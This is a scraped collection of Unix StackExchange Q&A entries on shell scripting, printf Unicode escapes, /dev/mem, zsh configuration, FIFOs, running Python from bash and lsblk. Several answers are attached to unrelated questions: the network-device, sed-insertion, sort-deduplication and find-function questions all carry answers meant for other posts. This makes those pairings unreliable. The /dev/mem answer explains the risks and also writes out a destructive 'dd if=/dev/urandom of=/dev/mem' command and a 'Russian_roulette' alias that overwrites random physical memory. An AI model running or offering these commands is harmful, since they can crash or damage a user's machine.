14: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/plugins/commands/plugin/command/base.rb:14:in `action'
13: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/action/runner.rb:102:in `run'
12: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/util/busy.rb:19:in `busy'
11: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/action/runner.rb:102:in `block in run'
10: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/action/builder.rb:116:in `call'
9: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/action/warden.rb:50:in `call'
8: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/action/builtin/before_trigger.rb:23:in `call'
7: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/action/warden.rb:50:in `call'
6: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/plugins/commands/plugin/action/update_gems.rb:23:in `call'
5: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/plugin/manager.rb:228:in `update_plugins'
4: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/bundler.rb:242:in `clean'
3: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/bundler.rb:242:in `each'
2: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/bundler.rb:251:in `block in clean'
1: from /usr/lib/ruby/2.6.0/rubygems/uninstaller.rb:162:in `uninstall_gem'
/usr/lib/ruby/2.6.0/rubygems/uninstaller.rb:264:in `remove': uninitialized constant Gem::RDoc (NameError) This or similar errors seem to happen every single time I update plugins in Vagrant. Is my system broken in some way? | Use an XML parser for parsing XML data. With xmlstarlet it just becomes an XPath exercise: $ branch=$(xmlstarlet sel -t -v '//blah1[@name="andy"]/@branch' file.xml)
$ echo $branch
master | {
"source": [
"https://unix.stackexchange.com/questions/529696",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/3645/"
]
} |
530,788 | I'm running Arch Linux with simple terminal using the Adobe Source Code Pro font. My locale is correctly set to LANG=en_US.UTF-8 . I want to print Unicode characters representing playing cards to my terminal. I'm using Wikipedia for reference . The Unicode characters for card suits work fine. For example, issuing $ printf "\u2660" prints a black heart to the screen. However, I'm having trouble with specific playing cards. Issuing $ printf "\u1F0A1" prints the symbol Ἂ1 instead of the ace of spades . What's going wrong? This problem persists across several terminals (urxvt, xterm, termite) and every font I've tried (DejaVu, Inconsolata). | help printf defers to printf(1) for the escape sequences interpreted, and the docs for GNU printf says: printf interprets two character syntaxes introduced in ISO C 99: \u for 16-bit Unicode (ISO/IEC 10646) characters, specified as four
hexadecimal digits hhhh , and \U for 32-bit Unicode characters,
specified as eight hexadecimal digits hhhhhhhh . printf outputs the
Unicode characters according to the LC_CTYPE locale. Unicode
characters in the ranges U+0000…U+009F, U+D800…U+DFFF cannot be
specified by this syntax, except for U+0024 ($), U+0040 (@), and
U+0060 (`). Something similar is specified in the Bash manual for ANSI C Quoting and echo : \uHHHH the Unicode (ISO/IEC 10646) character whose value is the hexadecimal
value HHHH (one to four hex digits) \UHHHHHHHH the Unicode (ISO/IEC 10646) character whose value is the hexadecimal
value HHHHHHHH (one to eight hex digits) In short: \u is not for 5 hex digits. It's \U : # printf "\u2660 \u1F0A1 \U1F0A1\n"
♠ Ἂ1 | {
"source": [
"https://unix.stackexchange.com/questions/530788",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/92703/"
]
} |
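For completeness, a short sketch printing neighbouring cards from the same Unicode block (the spades run occupies U+1F0A1 through U+1F0AE), written with all eight hex digits after \U for clarity:

```sh
printf '\U0001F0A1 \U0001F0A2 \U0001F0A3\n'   # ace, two and three of spades
```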
531,795 | How may I shorten this shell script? CODE="A"
if test "$CODE" = "A"
then
PN="com.tencent.ig"
elif test "$CODE" = "a"
then
PN="com.tencent.ig"
elif test "$CODE" = "B"
then
PN="com.vng.pubgmobile"
elif test "$CODE" = "b"
then
PN="com.vng.pubgmobile"
elif test "$CODE" = "C"
then
PN="com.pubg.krmobile"
elif test "$CODE" = "c"
then
PN="com.pubg.krmobile"
elif test "$CODE" = "D"
then
PN="com.rekoo.pubgm"
elif test "$CODE" = "d"
then
PN="com.rekoo.pubgm"
else
echo -e "\a\t ERROR!"
echo -e "\a\t CODE KOSONG"
echo -e "\a\t MELAKUKAN EXIT OTOMATIS"
exit
fi | Use a case statement (portable, works in any sh -like shell): case "$CODE" in
[aA] ) PN="com.tencent.ig" ;;
[bB] ) PN="com.vng.pubgmobile" ;;
[cC] ) PN="com.pubg.krmobile" ;;
[dD] ) PN="com.rekoo.pubgm" ;;
* ) printf '\a\t%s\n' 'ERROR!' 'CODE KOSONG' 'MELAKUKAN EXIT OTOMATIS' >&2
exit 1 ;;
esac I'd also recommend changing your variable names from all capital letters (like CODE ) to something lower- or mixed-case (like code or Code ). There are many all-caps names that have special meanings, and re-using one of them by accident can cause trouble. Other notes: The standard convention is to send error messages to "standard error" rather than "standard output"; the >&2 redirect does this. Also, if a script (or program) fails, it's best to exit with a nonzero status ( exit 1 ), so any calling context can tell what went wrong. It's also possible to use different statuses to indicate different problems (see the "EXIT CODES" section of the curl man page for a good example). (Credit to Stéphane Chazelas and Monty Harder for suggestions here.) I recommend printf instead of echo -e (and echo -n ), because it's more portable between OSes, versions, settings, etc. I once had a bunch of my scripts break because an OS update included a version of bash compiled with different options, which changed how echo behaved. The double-quotes around $CODE aren't really needed here. The string in a case is one of the few contexts where it's safe to leave them off. However, I prefer to double-quote variable references unless there's a specific reason not to, because it's hard to keep track of where it's safe and where it isn't, so it's safer to just habitually double-quote them. | {
"source": [
"https://unix.stackexchange.com/questions/531795",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/363485/"
]
} |
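As a usage variant of the case approach, the input can be folded to lower case once instead of spelling out [aA] patterns; tr keeps this portable to plain sh (bash 4+ could use "${CODE,,}" instead):

```sh
code=$(printf '%s' "$CODE" | tr '[:upper:]' '[:lower:]')
case "$code" in
    a ) PN="com.tencent.ig" ;;
    b ) PN="com.vng.pubgmobile" ;;
    c ) PN="com.pubg.krmobile" ;;
    d ) PN="com.rekoo.pubgm" ;;
    * ) printf '\a\t%s\n' 'ERROR!' 'CODE KOSONG' 'MELAKUKAN EXIT OTOMATIS' >&2
        exit 1 ;;
esac
```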
531,812 | I wanted to know if there is a way to differentiate physical and virtual network devices. ip a doesn't have an option. So I am trying /sys/class/net/<iface> .
There are 2 attributes addr_assign_type and type, but type only tells Ethernet or loopback there is not way to tell if its virtual. I wanted to know does addr_assign_type tell us the different? As per my observation /sys/class/net/<iface>/{eth|loopback} gives 0 and /sys/class/net/<iface>/{virtualdevice} gives 1 or 3 . Is there something I can infer from this? | Use a case statement (portable, works in any sh -like shell): case "$CODE" in
[aA] ) PN="com.tencent.ig" ;;
[bB] ) PN="com.vng.pubgmobile" ;;
[cC] ) PN="com.pubg.krmobile" ;;
[dD] ) PN="com.rekoo.pubgm" ;;
* ) printf '\a\t%s\n' 'ERROR!' 'CODE KOSONG' 'MELAKUKAN EXIT OTOMATIS' >&2
exit 1 ;;
esac I'd also recommend changing your variable names from all capital letters (like CODE ) to something lower- or mixed-case (like code or Code ). There are many all-caps names that have special meanings, and re-using one of them by accident can cause trouble. Other notes: The standard convention is to send error messages to "standard error" rather than "standard output"; the >&2 redirect does this. Also, if a script (or program) fails, it's best to exit with a nonzero status ( exit 1 ), so any calling context can tell what went wrong. It's also possible to use different statuses to indicate different problems (see the "EXIT CODES" section of the curl man page for a good example). (Credit to Stéphane Chazelas and Monty Harder for suggestions here.) I recommend printf instead of echo -e (and echo -n ), because it's more portable between OSes, versions, settings, etc. I once had a bunch of my scripts break because an OS update included a version of bash compiled with different options, which changed how echo behaved. The double-quotes around $CODE aren't really needed here. The string in a case is one of the few contexts where it's safe to leave them off. However, I prefer to double-quote variable references unless there's a specific reason not to, because it's hard to keep track of where it's safe and where it isn't, so it's safer to just habitually double-quote them. | {
"source": [
"https://unix.stackexchange.com/questions/531812",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/363767/"
]
} |
532,134 | Why isn't there a ; character after do in shell loops when written on a single line? Here's what I mean. When written on a multiple lines, a for loop looks like: $ for i in $(jot 2)
> do
> echo $i
> done And on a single line: $ for i in $(jot 2); do echo $i; done All the collapsed lines get a ; after them except for the do line, and if you include the ; , it is an error. Someone probably a heck of a lot smarter than me decided that this was the right thing to do for a reason, but I can't figure out what the reason is. It seems inconsistent to me. The same with while loops too. $ while something
> do
> anotherthing
> done
$ while something; do anotherthing; done | That is the syntax of the command. See Compound Commands for name [ [in [words …] ] ; ] do commands; done Note specifically: do commands Most people put the do and commands on a separate line to allow for easier readability but it is not necessary, you could write: for i in thing
do something
done I know this question is specifically about shell and I have linked to the bash manual. It is not written that way in the shell manual but it is written that way in an article written by Stephen Bourne for byte magazine. Stephen says: A command list is a sequence of one or more simple commands separated or terminated by a newline or ; (semicolon). Furthermore, reserved words like do and done are normally preceded by a newline or ; ... In turn each time the command list following do is executed. | {
"source": [
"https://unix.stackexchange.com/questions/532134",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/235518/"
]
} |
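A quick demonstration of why adding the semicolon after do fails: do introduces the command list, so a ; immediately after it has no command to terminate. The exact error wording varies between shells; with bash it looks roughly like this:

```sh
$ for i in 1 2; do; echo "$i"; done
bash: syntax error near unexpected token `;'
$ for i in 1 2; do echo "$i"; done
1
2
```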
532,381 | What exactly does this do? I don't understand how you could access base memory with this...seems kinda weird. Is it safe? dd if=/dev/urandom of=/dev/mem | Don't try this at home! It can crash your system, and if you're really unlucky it could damage a peripheral or make your computer unbootable. Actually, on most platforms, it just fails with an error, but that depends on the hardware architecture. There is most definitely no guarantee that this is harmless unless you run the command as an unprivileged user. With an unprivileged user, the command is perfectly harmless because you can't open /dev/mem . When you run a command as root, you're supposed to know what you're doing. The kernel will sometimes prevent you from doing something dangerous, but not always. /dev/mem is one of those potentially dangerous things where you're really supposed to know what you're doing. I'm going to walk through how a write to /dev/mem works on Linux. The general principle would be the same on other Unices, but things like kernel options are completely different. What happens when a process reads or writes to a device file is up to the kernel. An access to a device file runs some code in the driver that handles this device file. For example, writing to /dev/mem invokes the function write_mem in drivers/char/mem.c . This function takes 4 arguments: a data structure that represents the open file, a pointer to the data to write, the number of bytes to write, and the current position in the file. Note that you only get that far if the caller had permission to open the file in the first place. Device files obey file permissions normally. The normal permissions of /dev/mem are crw-r----- owned by root:kmem , so if you try to open it for writing without being root, you'll just get “permission denied” (EACCESS). But if you're root (or if root has changed the permissions of this file), the opening goes through and then you can attempt a write. The code in the write_mem function makes some sanity checks, but these checks aren't enough to protect against everything bad. The first thing it does is convert the current file position *ppos to a physical address. If that fails (in practice, because you're on a platform with 32-bit physical addresses but 64-bit file offsets and the file offset is larger than 2^32), the write fails with EFBIG (file too large). The next check is whether the range of physical addresses to write is valid on this particular processor architecture, and there a failure results in EFAULT (bad address). Next, on Sparc and m68k, any part of the write in the very first physical page is silently skipped. We've now reached the main loop which iterates over the data in blocks that can fit within one MMU page. /dev/mem accesses physical memory, not virtual memory, but the processor instructions to load and store data in memory use virtual addresses, so the code needs to arrange to map the physical memory at some virtual address. On Linux, depending on the processor architecture and the kernel configuration, this mapping either exists permantently or has to be made on the fly; that's the job of xlate_dev_mem_ptr (and unxlate_dev_mem_ptr undoes whatever xlate_dev_mem_ptr does). Then the function copy_from_user reads from the buffer that was passed to the write system call and just writes to the virtual address where the physical memory is currently mapped. The code emits normal memory store instructions, and what this means is up to the hardware. 
Before I discuss what a write to a physical address does, I'll discuss a check that happens before this write. Inside the loop, the function page_is_allowed blocks accesses to certain addresses if the kernel configuration option CONFIG_STRICT_DEVMEM is enabled (which is the case by default): only addresses allowed by devmem_is_allowed can be reached through /dev/mem , for others the write fails with EPERM (operation not permitted). The description of this option states: If this option is switched on, and IO_STRICT_DEVMEM=n, the /dev/mem file only allows userspace access to PCI space and the BIOS code and data regions. This is sufficient for dosemu and X and all common users of /dev/mem. This is a very x86-centric description.
The additional option CONFIG_IO_STRICT_DEVMEM (disabled as of Ubuntu 18.04) blocks accesses to physical addresses that are claimed by a driver. Physical memory addresses that map to RAM . So there are physical memory addresses that don't map to RAM? Yes. That's the discussion I promised above about what it means to write to an address. A memory store instruction does not necessarily write to RAM. The processor decomposes the address and decides which peripheral to dispatch the store to. (When I say “the processor”, I encompass peripheral controllers which may not come from the same manufacturer.) RAM is only one of those peripherals. How the dispatch is done is very dependent on the processor architecture, but the fundamentals are more or less the same on all architectures. The processor basically decomposes the higher bits of the address and looks them up in some tables that are populated based on hard-coded information, information obtained by probing some buses, and information configured by the software. A lot of caching and buffering may be involved, but in a nutshell, after this decomposition, the processor writes something (encoding both the target address and the data that's being stored) on some bus and then it's up to the peripheral to deal with it. (Or the outcome of the table lookup might be that there is no peripheral at this address, in which case the processor enters a trap state where it executes some code in the kernel that normally results in a SIGBUS for the calling process.) A store to an address that maps to RAM doesn't “do” anything other than overwrite the value that was previously stored at this address, with the promise that a later load at the same address will give back the last stored value. But even RAM has a few addresses that don't behave this way: it has a few registers that can control things like refresh rate and voltage. In general, a read or write to a hardware register does whatever the hardware is programmed to do. Most accesses to hardware work this way: the software (normally kernel code) accesses a certain physical address, this reaches the bus that connects the processor to the peripheral, and the peripheral does its thing. Some processors (in particular x86) also have separate CPU instructions that cause reads/writes to peripherals which are distinct from memory load and store, but even on x86, many peripherals are reached through load/store. The command dd if=/dev/urandom of=/dev/mem writes random data to whatever peripheral is mapped at address 0 (and subsequent addresses, as long as the writes succeed). In practice, I expect that on many architectures, physical address 0 doesn't have any peripheral mapped to it, or has RAM, and therefore the very first write attempt fails. But if there is a peripheral mapped at address 0, or if you change the command to write to a different address, you'll trigger something unpredictable in the peripheral. With random data at increasing addresses, it's unlikely to do something interesting, but in principle it could turn off the computer (there's probably an address that does this in fact), overwrite some BIOS setting that makes it impossible to boot, or even hit some buggy peripheral in a way that damages it. alias Russian_roulette='dd if=/dev/urandom of=/dev/mem seek=$((4096*RANDOM+4096*32768*RANDOM))' | {
"source": [
"https://unix.stackexchange.com/questions/532381",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/364072/"
]
} |
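A harmless sketch to go with the discussion of CONFIG_STRICT_DEVMEM: check how your own kernel was built (the config file location varies by distribution, and /proc/config.gz only exists if the kernel was built with IKCONFIG support):

```sh
grep -E 'CONFIG_(IO_)?STRICT_DEVMEM' "/boot/config-$(uname -r)" 2>/dev/null \
  || zcat /proc/config.gz 2>/dev/null | grep -E 'CONFIG_(IO_)?STRICT_DEVMEM'
```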
532,548 | I just edited the .zshrc file to configure Z shell on FreeBSD, for example to update the PATH system variable. path+=/usr/local/openjdk12/bin How do I make the changes take effect? Must I log out and log in again? Is there a way to immediately run that file? | Restart zsh Zsh reads .zshrc when it starts. You don't need to log out and log back in. Just closing the terminal and opening a new one gives you your new .zshrc in this new terminal. But you can make this more direct. Just tell zsh to relaunch itself: exec zsh If you run this at a zsh prompt, this replaces the current instance of zsh by a new one, running in the same terminal. The new instance has the same environment variables as the previous one, but has fresh shell (non-exported) variables, and it starts a new history (so it'll mix in commands from other terminals in typical configurations). Any background jobs are disowned. Reread .zshrc You can also tell zsh to re-read .zshrc . This has the advantage of preserving the shell history, shell variables, and knowledge of background jobs. But depending on what you put in your .zshrc , this may or may not work. Re-reading .zshrc runs commands which may not work, or not work well, if you run them twice. . ~/.zshrc There are just too many things you can do to enumerate everything that's ok and not ok to put in .zshrc if you want to be able to run it twice. Here are just some common issues: If you append to a variable (e.g. fpath+=(~/.config/zsh) or chpwd_functions+=(my_chpwd) ), this appends the same elements again, which may or may not be a problem. If you define aliases, and also use the same name as a command, the command will now run the alias. For example, this works: function foo { … }
alias foo='foo --common-option' But this doesn't, because the second time the file is sourced, foo () will expand the alias: foo () { … }
alias foo='foo --common-option' If you patch an existing zsh function, you'll now be patching your own version, which will probably make a mess. If you do something like “swap the bindings of two keys”, that won't do what you want the second time. | {
"source": [
"https://unix.stackexchange.com/questions/532548",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/56752/"
]
} |
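Since re-sourcing .zshrc can append duplicate entries to array variables, here is a small sketch of how the path update from the question can be made safe to run twice, using zsh's unique-array flag:

```sh
# In ~/.zshrc:
typeset -U path fpath                 # keep these arrays free of duplicate entries
path+=(/usr/local/openjdk12/bin)
```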
532,549 | i'm trying to insert variables before specific line in my script. this is the code that i'm using: var1=$(echo "database1=")
var2=$(echo "database2=")
var3=$(echo "database3=")
sed -i "/#variables/i \
$var1\
$var2\
$var3" /data1/create_database i expect that create_database be like this after i run above command: database1=
database2=
database3=
#variables but i get this result: database1= database2= database3=
#variables tried few ways nothing worked. what should i do? | Restart zsh Zsh reads .zshrc when it starts. You don't need to log out and log back in. Just closing the terminal and opening a new one gives you your new .zshrc in this new terminal. But you can make this more direct. Just tell zsh to relaunch itself: exec zsh If you run this at a zsh prompt, this replaces the current instance of zsh by a new one, running in the same terminal. The new instance has the same environment variables as the previous one, but has fresh shell (non-exported) variables, and it starts a new history (so it'll mix in commands from other terminals in typical configurations). Any background jobs are disowned. Reread .zshrc You can also tell zsh to re-read .zshrc . This has the advantage of preserving the shell history, shell variables, and knowledge of background jobs. But depending on what you put in your .zshrc , this may or may not work. Re-reading .zshrc runs commands which may not work, or not work well, if you run them twice. . ~/.zshrc There are just too many things you can do to enumerate everything that's ok and not ok to put in .zshrc if you want to be able to run it twice. Here are just some common issues: If you append to a variable (e.g. fpath+=(~/.config/zsh) or chpwd_functions+=(my_chpwd) ), this appends the same elements again, which may or may not be a problem. If you define aliases, and also use the same name as a command, the command will now run the alias. For example, this works: function foo { … }
alias foo='foo --common-option' But this doesn't, because the second time the file is sourced, foo () will expand the alias: foo () { … }
alias foo='foo --common-option' If you patch an existing zsh function, you'll now be patching your own version, which will probably make a mess. If you do something like “swap the bindings of two keys”, that won't do what you want the second time. | {
"source": [
"https://unix.stackexchange.com/questions/532549",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/314925/"
]
} |
532,578 | I've used the mkfifo <file> command to create named FIFOs, where one process writes to the file, and another process reads from the file. Now, I know the mknod command is able to create named pipes. Are these named pipes equivalent to the FIFOs created by mkfifo , or do they have different features? | Yes, it's equivalent, but obviously only if you tell mknod to actually create a FIFO, and not a block or character device (rarely done these days as devtmpfs/udev does it for you). mkfifo foobar
# same difference
mknod foobar p In strace it's identical for both commands: mknod("foobar", S_IFIFO|0666) = 0 So in terms of syscalls, mkfifo is actually shorthand for mknod . The biggest difference, then, is in semantics. With mkfifo you can create a bunch of FIFOs in one go: mkfifo a b c With mknod , since you have to specify the type, it only ever accepts one argument: # wrong:
$ mknod a b c p
mknod: invalid major device number ‘c’
# right:
mknod a p
mknod b p
mknod c p In general, mknod can be difficult to use correctly. So if you want to work with FIFO, stick to mkfifo . | {
"source": [
"https://unix.stackexchange.com/questions/532578",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/128739/"
]
} |
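A quick way to see the equivalence described above for yourself; this is only a sketch, assuming the GNU coreutils stat, and the names fifo_a and fifo_b are arbitrary:
#!/bin/sh
# Create one FIFO with each tool, then compare what the filesystem reports.
mkfifo fifo_a
mknod fifo_b p
stat -c '%n: %F' fifo_a fifo_b    # both should report "fifo"
ls -l fifo_a fifo_b               # both lines should start with "p"
rm fifo_a fifo_b
If the two stat lines differ only in the name, the two commands really did create the same kind of file.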
533,156 | If I try to start python in a bash script, the script will stop running and no commands will execute after "Python" is called. In this simple example, "TESTPRINT" will not be printed. It seems like the script just stops. #!/bin/bash
python
print("TESTPRINT")
Echo How do I make the script continue running after going into Python? I believe I had the same problem a few years ago after writing a script that first needed to shell into an Android Phone. I can't remember how I fixed it that time. | To run a set of Python commands from a bash script, you must give the Python interpreter the commands to run, either from a file (Python script) that you create in the script, as in #!/bin/bash -e
# Create script as "script.py"
cat >script.py <<'END_SCRIPT'
print("TESTPRINT")
END_SCRIPT
# Run script.py
python script.py
rm script.py (this creates a new file called script.py or overwrites that file if it already exists, and then instructs Python to run it; it is then deleted) ... or directly via some form of redirection, for example a here-document: #!/bin/bash
python - <<'END_SCRIPT'
print("TESTPRINT")
END_SCRIPT What this does is running python - which instructs the Python interpreter to read the script from standard input. The shell then sends the text of the Python script (delimited by END_SCRIPT in the shell script) to the Python process' standard input stream. Note that the two bits of code above are subtly different in that the second script's Python process has its standard input connected to the script that it's reading, while the first script's Python process is free to read data other than the script from standard input. This matters if your Python code reads from standard input. Python can also take a set of commands from the command line directly with its -c option: #!/bin/bash
python -c 'print("TESTPRINT")' What you can't do is to "switch to Python" in the middle of a bash script. The commands in a script are executed by bash one after the other, and while a command is executing, the script itself waits for it to terminate (if it's not a background job). This means that your original script would start Python in interactive mode, temporarily suspending the execution of the bash script until the Python process terminates. The script would then try to execute print("TESTPRINT") as a shell command. It's a similar issue with using ssh like this in a script: ssh user@server
cd /tmp
ls (which may possibly be similar to what you say you tried a few years ago). This would not connect to the remote system and run the cd and ls commands there. It would start an interactive shell on the remote system, and once that shell has terminated (giving control back to the script), cd and ls would be run locally. Instead, to execute the commands on a remote machine, use ssh user@server "cd /tmp; ls" (This is a lame example, but you may get the point). The below example shows how you may actually do what you propose. It comes with several warning label and caveats though, and you should never ever write code like this (because it's obfuscated and therefore unmaintainable and, dare I say it, downright bad). python -
print("TESTPRINT") Running it: $ sh -s <script.sh
TESTPRINT What happens here is that the script is being run by sh -s . The -s option to sh (and to bash ) tells the shell to execute the shell script arriving over the standard input stream. The script then starts python - , which tells Python to run whatever comes in over the standard input stream. The next thing on that stream, since it's inherited from sh -s by Python (and therefore connected to our script text file), is the Python command print("TESTPRINT") . The Python interpreter would then continue reading and executing commands from the script file until it runs out or executes the Python command exit() . | {
"source": [
"https://unix.stackexchange.com/questions/533156",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/364877/"
]
} |
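Applying the here-document form from the answer above to the script in the question gives something like the following sketch; the lowercase echo replaces the question's stray Echo and is only there to prove that bash keeps running:
#!/bin/bash
# The Python code is fed to the interpreter on stdin instead of being
# (incorrectly) treated as shell commands after "python" exits.
python - <<'END_SCRIPT'
print("TESTPRINT")
END_SCRIPT
echo "back in bash, the script keeps going"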
533,161 | This is more about finding an elegant solution to a problem, I think I have a working solution. I have the following input file format, tab-separated, on an Ubuntu machine: AC003665.1 17 47813266 AGCAGGCGCA 83
RIOK3 18 23453502 GCAAGGCCCC 52
UBE2Z 17 48910880 CTAAGGATCC 48
CSNK1D 17 82251379 AATTTAGCCA 68
CSNK1D 17 82251379 AATTTCTTGT 38
SMURF1 7 99143726 GACAGATTGG 74
SMURF1 7 99143726 GACAGATTGG 61
RIOK3 18 23453502 GCAAGACTTT 69 I want to get only one line per occurrence of field 3, the one that has the highest value in field 5. Output should therefore be: AC003665.1 17 47813266 AGCAGGCGCA 83
CSNK1D 17 82251379 AATTTAGCCA 68
UBE2Z 17 48910880 CTAAGGATCC 48
SMURF1 7 99143726 GACAGATTGG 74
RIOK3 18 23453502 GCAAGACTTT 69 Order is irrelevant for my purposes. I have found a solution that involves sorting first on field 5, and then on field 3, that I think works: sort -k 5,5nr input | sort -u -k 3,3n > output It works with all my test files and I think should work in any case, as this should ensure that for every value of field 3 the sorting will see first (and therefore keep) the line with the highest value for field 5. I however feel that there should be a more elegant (and maybe more foolproof) solution to that problem ? Any help is appreciated. | To run a set of Python commands from a bash script, you must give the Python interpreter the commands to run, either from a file (Python script) that you create in the script, as in #!/bin/bash -e
# Create script as "script.py"
cat >script.py <<'END_SCRIPT'
print("TESTPRINT")
END_SCRIPT
# Run script.py
python script.py
rm script.py (this creates a new file called script.py or overwrites that file if it already exists, and then instructs Python to run it; it is then deleted) ... or directly via some form of redirection, for example a here-document: #!/bin/bash
python - <<'END_SCRIPT'
print("TESTPRINT")
END_SCRIPT What this does is running python - which instructs the Python interpreter to read the script from standard input. The shell then sends the text of the Python script (delimited by END_SCRIPT in the shell script) to the Python process' standard input stream. Note that the two bits of code above are subtly different in that the second script's Python process has its standard input connected to the script that it's reading, while the first script's Python process is free to read data other than the script from standard input. This matters if your Python code reads from standard input. Python can also take a set of commands from the command line directly with its -c option: #!/bin/bash
python -c 'print("TESTPRINT")' What you can't do is to "switch to Python" in the middle of a bash script. The commands in a script is executed by bash one after the other, and while a command is executing, the script itself waits for it to terminate (if it's not a background job). This means that your original script would start Python in interactive mode, temporarily suspending the execution of the bash script until the Python process terminates. The script would then try to execute print("TESTPRINT") as a shell command. It's a similar issue with using ssh like this in a script: ssh user@server
cd /tmp
ls (which may possibly be similar to what you say you tried a few years ago). This would not connect to the remote system and run the cd and ls commands there. It would start an interactive shell on the remote system, and once that shell has terminated (giving control back to the script), cd and ls would be run locally. Instead, to execute the commands on a remote machine, use ssh user@server "cd /tmp; ls" (This is a lame example, but you may get the point). The below example shows how you may actually do what you propose. It comes with several warning label and caveats though, and you should never ever write code like this (because it's obfuscated and therefore unmaintainable and, dare I say it, downright bad). python -
print("TESTPRINT") Running it: $ sh -s <script.sh
TESTPRINT What happens here is that the script is being run by sh -s . The -s option to sh (and to bash ) tells the shell to execute the shell script arriving over the standard input stream. The script then starts python - , which tells Python to run whatever comes in over the standard input stream. The next thing on that stream, since it's inherited from sh -s by Python (and therefore connected to our script text file), is the Python command print("TESTPRINT") . The Python interpreter would then continue reading and executing commands from the script file until it runs out or executes the Python command exit() . | {
"source": [
"https://unix.stackexchange.com/questions/533161",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/364876/"
]
} |
533,183 | I have created this bash function to recursively find a file. ff() {
find . -type f -name '$1'
} However, it returns no results. When I execute the command directly on the commandline, I do get results. I am not sure why it behaves differently, as shown below. mattr@kiva-mattr:~/src/protocol$ ff *.so
mattr@kiva-mattr:~/src/protocol$ find . -type f -name '*.so'
./identity_wallet_service/resources/libindystrgpostgres.so Why does my function not work as expected? I am using MacOS and bash shell. Thnx
Matt | To run a set of Python commands from a bash script, you must give the Python interpreter the commands to run, either from a file (Python script) that you create in the script, as in #!/bin/bash -e
# Create script as "script.py"
cat >script.py <<'END_SCRIPT'
print("TESTPRINT")
END_SCRIPT
# Run script.py
python script.py
rm script.py (this creates a new file called script.py or overwrites that file if it already exists, and then instructs Python to run it; it is then deleted) ... or directly via some form of redirection, for example a here-document: #!/bin/bash
python - <<'END_SCRIPT'
print("TESTPRINT")
END_SCRIPT What this does is running python - which instructs the Python interpreter to read the script from standard input. The shell then sends the text of the Python script (delimited by END_SCRIPT in the shell script) to the Python process' standard input stream. Note that the two bits of code above are subtly different in that the second script's Python process has its standard input connected to the script that it's reading, while the first script's Python process is free to read data other than the script from standard input. This matters if your Python code reads from standard input. Python can also take a set of commands from the command line directly with its -c option: #!/bin/bash
python -c 'print("TESTPRINT")' What you can't do is to "switch to Python" in the middle of a bash script. The commands in a script is executed by bash one after the other, and while a command is executing, the script itself waits for it to terminate (if it's not a background job). This means that your original script would start Python in interactive mode, temporarily suspending the execution of the bash script until the Python process terminates. The script would then try to execute print("TESTPRINT") as a shell command. It's a similar issue with using ssh like this in a script: ssh user@server
cd /tmp
ls (which may possibly be similar to what you say you tried a few years ago). This would not connect to the remote system and run the cd and ls commands there. It would start an interactive shell on the remote system, and once that shell has terminated (giving control back to the script), cd and ls would be run locally. Instead, to execute the commands on a remote machine, use ssh user@server "cd /tmp; ls" (This is a lame example, but you may get the point). The below example shows how you may actually do what you propose. It comes with several warning label and caveats though, and you should never ever write code like this (because it's obfuscated and therefore unmaintainable and, dare I say it, downright bad). python -
print("TESTPRINT") Running it: $ sh -s <script.sh
TESTPRINT What happens here is that the script is being run by sh -s . The -s option to sh (and to bash ) tells the shell to execute the shell script arriving over the standard input stream. The script then starts python - , which tells Python to run whatever comes in over the standard input stream. The next thing on that stream, since it's inherited from sh -s by Python (and therefore connected to our script text file), is the Python command print("TESTPRINT") . The Python interpreter would then continue reading and executing commands from the script file until it runs out or executes the Python command exit() . | {
"source": [
"https://unix.stackexchange.com/questions/533183",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/364914/"
]
} |
533,331 | My goal is to get the disks greater than 100G from lsblk. I have it working, but it's awkward. I'm pretty sure it can be shortened. Either by using something totally different than lsblk, or maybe I can filter human readable numbers directly with awk. Here's what I put together: lsblk | grep disk | awk '{print$1,$4}' | grep G | sed 's/.$//' | awk '{if($2>100)print$1}' It outputs only the sdx and nvmexxx part of the disks larger than 100G. Exactly what I need. I am happy with it, but am eager to learn more from you Gurus | You can specify the form of output you want from lsblk : % lsblk -nblo NAME,SIZE
mmcblk0 15931539456
mmcblk0p1 268435456
mmcblk0p2 15662038528 Options used : -b, --bytes
Print the SIZE column in bytes rather than in human-readable format.
-l, --list
Use the list output format.
-n, --noheadings
Do not print a header line.
-o, --output list
Specify which output columns to print. Use --help to get a list of all supported
columns. Then the filtering is easier: % lsblk -nblo NAME,SIZE | awk '$2 > 4*2^30 {print $1}' # greater than 4 GiB
mmcblk0
mmcblk0p2 In your case, that'd be 100*2^30 for 100GiB or 100e9 / 1e11 for 100GB. | {
"source": [
"https://unix.stackexchange.com/questions/533331",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/358708/"
]
} |
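Putting the answer's flags together with the 100G threshold from the question gives a one-liner along these lines; it assumes the util-linux lsblk with the NAME, TYPE and SIZE columns, and uses 2^30 for GiB (use 100e9 instead for decimal GB):
#!/bin/sh
# -d drops partitions and other dependent devices; -n/-b/-l/-o as explained above.
lsblk -dnblo NAME,TYPE,SIZE |
  awk '$2 == "disk" && $3 > 100 * 2^30 {print $1}'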
